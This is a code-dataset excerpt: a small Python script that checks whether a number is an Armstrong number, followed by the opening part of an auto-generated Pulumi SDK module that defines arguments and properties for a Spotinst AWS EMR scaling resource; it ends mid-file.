] | 4 | 2021-04-23T06:16:52.000Z | 2022-01-03T14:36:51.000Z | Python/Math/Armstrong-Number/armstrong-number.py | manoj-paramsetti-testing/Algorithm-Warehouse | 89c41146a1c444605830016319e00c343fdbe154 | [
"MIT"
] | 9 | 2021-04-12T02:56:35.000Z | 2021-06-19T00:43:04.000Z | Python/Math/Armstrong-Number/armstrong-number.py | manoj-paramsetti-testing/Algorithm-Warehouse | 89c41146a1c444605830016319e00c343fdbe154 | [
"MIT"
] | 2 | 2021-04-13T06:09:04.000Z | 2021-04-13T10:59:15.000Z | num = int(input("Enter a number: "))
sum = 0; size = 0; temp = num; temp2 = num
while(temp2!=0):
size += 1
temp2 = int(temp2/10)
while(temp!=0):
remainder = temp%10
sum += remainder**size
temp = int(temp/10)
if(sum == num):
print("It's an armstrong number")
else:
print("It's not an armstrong number")
| 17.684211 | 42 | 0.58631 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 74 | 0.220238 |
635cce5473f8750091e7f18d6db45331eaca5c07 | 174,251 | py | Python | sdk/python/pulumi_spotinst/aws/mr_scalar.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2019-12-21T20:50:43.000Z | 2021-12-01T20:57:38.000Z | sdk/python/pulumi_spotinst/aws/mr_scalar.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | 103 | 2019-12-09T22:03:16.000Z | 2022-03-30T17:07:34.000Z | sdk/python/pulumi_spotinst/aws/mr_scalar.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MrScalarArgs', 'MrScalar']
@pulumi.input_type
class MrScalarArgs:
def __init__(__self__, *,
strategy: pulumi.Input[str],
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a MrScalar resource.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]] steps_files: Steps from S3.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
pulumi.set(__self__, "strategy", strategy)
if additional_info is not None:
pulumi.set(__self__, "additional_info", additional_info)
if additional_primary_security_groups is not None:
pulumi.set(__self__, "additional_primary_security_groups", additional_primary_security_groups)
if additional_replica_security_groups is not None:
pulumi.set(__self__, "additional_replica_security_groups", additional_replica_security_groups)
if applications is not None:
pulumi.set(__self__, "applications", applications)
if availability_zones is not None:
pulumi.set(__self__, "availability_zones", availability_zones)
if bootstrap_actions_files is not None:
pulumi.set(__self__, "bootstrap_actions_files", bootstrap_actions_files)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if configurations_files is not None:
pulumi.set(__self__, "configurations_files", configurations_files)
if core_desired_capacity is not None:
pulumi.set(__self__, "core_desired_capacity", core_desired_capacity)
if core_ebs_block_devices is not None:
pulumi.set(__self__, "core_ebs_block_devices", core_ebs_block_devices)
if core_ebs_optimized is not None:
pulumi.set(__self__, "core_ebs_optimized", core_ebs_optimized)
if core_instance_types is not None:
pulumi.set(__self__, "core_instance_types", core_instance_types)
if core_lifecycle is not None:
pulumi.set(__self__, "core_lifecycle", core_lifecycle)
if core_max_size is not None:
pulumi.set(__self__, "core_max_size", core_max_size)
if core_min_size is not None:
pulumi.set(__self__, "core_min_size", core_min_size)
if core_scaling_down_policies is not None:
pulumi.set(__self__, "core_scaling_down_policies", core_scaling_down_policies)
if core_scaling_up_policies is not None:
pulumi.set(__self__, "core_scaling_up_policies", core_scaling_up_policies)
if core_unit is not None:
pulumi.set(__self__, "core_unit", core_unit)
if custom_ami_id is not None:
pulumi.set(__self__, "custom_ami_id", custom_ami_id)
if description is not None:
pulumi.set(__self__, "description", description)
if ebs_root_volume_size is not None:
pulumi.set(__self__, "ebs_root_volume_size", ebs_root_volume_size)
if ec2_key_name is not None:
pulumi.set(__self__, "ec2_key_name", ec2_key_name)
if expose_cluster_id is not None:
pulumi.set(__self__, "expose_cluster_id", expose_cluster_id)
if instance_weights is not None:
pulumi.set(__self__, "instance_weights", instance_weights)
if job_flow_role is not None:
pulumi.set(__self__, "job_flow_role", job_flow_role)
if keep_job_flow_alive is not None:
pulumi.set(__self__, "keep_job_flow_alive", keep_job_flow_alive)
if log_uri is not None:
pulumi.set(__self__, "log_uri", log_uri)
if managed_primary_security_group is not None:
pulumi.set(__self__, "managed_primary_security_group", managed_primary_security_group)
if managed_replica_security_group is not None:
pulumi.set(__self__, "managed_replica_security_group", managed_replica_security_group)
if master_ebs_block_devices is not None:
pulumi.set(__self__, "master_ebs_block_devices", master_ebs_block_devices)
if master_ebs_optimized is not None:
pulumi.set(__self__, "master_ebs_optimized", master_ebs_optimized)
if master_instance_types is not None:
pulumi.set(__self__, "master_instance_types", master_instance_types)
if master_lifecycle is not None:
pulumi.set(__self__, "master_lifecycle", master_lifecycle)
if master_target is not None:
pulumi.set(__self__, "master_target", master_target)
if name is not None:
pulumi.set(__self__, "name", name)
if provisioning_timeout is not None:
pulumi.set(__self__, "provisioning_timeout", provisioning_timeout)
if region is not None:
pulumi.set(__self__, "region", region)
if release_label is not None:
pulumi.set(__self__, "release_label", release_label)
if repo_upgrade_on_boot is not None:
pulumi.set(__self__, "repo_upgrade_on_boot", repo_upgrade_on_boot)
if retries is not None:
pulumi.set(__self__, "retries", retries)
if scheduled_tasks is not None:
pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
if security_config is not None:
pulumi.set(__self__, "security_config", security_config)
if service_access_security_group is not None:
pulumi.set(__self__, "service_access_security_group", service_access_security_group)
if service_role is not None:
pulumi.set(__self__, "service_role", service_role)
if steps_files is not None:
pulumi.set(__self__, "steps_files", steps_files)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if task_desired_capacity is not None:
pulumi.set(__self__, "task_desired_capacity", task_desired_capacity)
if task_ebs_block_devices is not None:
pulumi.set(__self__, "task_ebs_block_devices", task_ebs_block_devices)
if task_ebs_optimized is not None:
pulumi.set(__self__, "task_ebs_optimized", task_ebs_optimized)
if task_instance_types is not None:
pulumi.set(__self__, "task_instance_types", task_instance_types)
if task_lifecycle is not None:
pulumi.set(__self__, "task_lifecycle", task_lifecycle)
if task_max_size is not None:
pulumi.set(__self__, "task_max_size", task_max_size)
if task_min_size is not None:
pulumi.set(__self__, "task_min_size", task_min_size)
if task_scaling_down_policies is not None:
pulumi.set(__self__, "task_scaling_down_policies", task_scaling_down_policies)
if task_scaling_up_policies is not None:
pulumi.set(__self__, "task_scaling_up_policies", task_scaling_up_policies)
if task_unit is not None:
pulumi.set(__self__, "task_unit", task_unit)
if termination_policies is not None:
pulumi.set(__self__, "termination_policies", termination_policies)
if termination_protected is not None:
pulumi.set(__self__, "termination_protected", termination_protected)
if visible_to_all_users is not None:
warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
if visible_to_all_users is not None:
pulumi.set(__self__, "visible_to_all_users", visible_to_all_users)
@property
@pulumi.getter
def strategy(self) -> pulumi.Input[str]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: pulumi.Input[str]):
pulumi.set(self, "strategy", value)
@property
@pulumi.getter(name="additionalInfo")
def additional_info(self) -> Optional[pulumi.Input[str]]:
"""
This is meta information about third-party applications that third-party vendors use for testing purposes.
"""
return pulumi.get(self, "additional_info")
@additional_info.setter
def additional_info(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "additional_info", value)
@property
@pulumi.getter(name="additionalPrimarySecurityGroups")
def additional_primary_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the master node.
"""
return pulumi.get(self, "additional_primary_security_groups")
@additional_primary_security_groups.setter
def additional_primary_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_primary_security_groups", value)
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@additional_replica_security_groups.setter
def additional_replica_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_replica_security_groups", value)
@property
@pulumi.getter
def applications(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
@applications.setter
def applications(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]):
pulumi.set(self, "applications", value)
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@availability_zones.setter
def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zones", value)
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@bootstrap_actions_files.setter
def bootstrap_actions_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]):
pulumi.set(self, "bootstrap_actions_files", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@configurations_files.setter
def configurations_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]):
pulumi.set(self, "configurations_files", value)
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@core_desired_capacity.setter
def core_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_desired_capacity", value)
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@core_ebs_block_devices.setter
def core_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]):
pulumi.set(self, "core_ebs_block_devices", value)
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@core_ebs_optimized.setter
def core_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "core_ebs_optimized", value)
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@core_instance_types.setter
def core_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "core_instance_types", value)
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "core_lifecycle")
@core_lifecycle.setter
def core_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_lifecycle", value)
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@core_max_size.setter
def core_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_max_size", value)
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
@core_min_size.setter
def core_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_min_size", value)
@property
@pulumi.getter(name="coreScalingDownPolicies")
def core_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_down_policies")
@core_scaling_down_policies.setter
def core_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]):
pulumi.set(self, "core_scaling_down_policies", value)
@property
@pulumi.getter(name="coreScalingUpPolicies")
def core_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_up_policies")
@core_scaling_up_policies.setter
def core_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]):
pulumi.set(self, "core_scaling_up_policies", value)
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "core_unit")
@core_unit.setter
def core_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_unit", value)
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
"""
return pulumi.get(self, "custom_ami_id")
@custom_ami_id.setter
def custom_ami_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "custom_ami_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ebsRootVolumeSize")
def ebs_root_volume_size(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "ebs_root_volume_size")
@ebs_root_volume_size.setter
def ebs_root_volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ebs_root_volume_size", value)
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@ec2_key_name.setter
def ec2_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ec2_key_name", value)
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> Optional[pulumi.Input[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@expose_cluster_id.setter
def expose_cluster_id(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "expose_cluster_id", value)
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@instance_weights.setter
def instance_weights(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]):
pulumi.set(self, "instance_weights", value)
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@job_flow_role.setter
def job_flow_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_flow_role", value)
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
return pulumi.get(self, "keep_job_flow_alive")
@keep_job_flow_alive.setter
def keep_job_flow_alive(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "keep_job_flow_alive", value)
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> Optional[pulumi.Input[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@log_uri.setter
def log_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "log_uri", value)
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@managed_primary_security_group.setter
def managed_primary_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_primary_security_group", value)
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@managed_replica_security_group.setter
def managed_replica_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_replica_security_group", value)
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@master_ebs_block_devices.setter
def master_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]):
pulumi.set(self, "master_ebs_block_devices", value)
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@master_ebs_optimized.setter
def master_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "master_ebs_optimized", value)
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@master_instance_types.setter
def master_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_instance_types", value)
@property
@pulumi.getter(name="masterLifecycle")
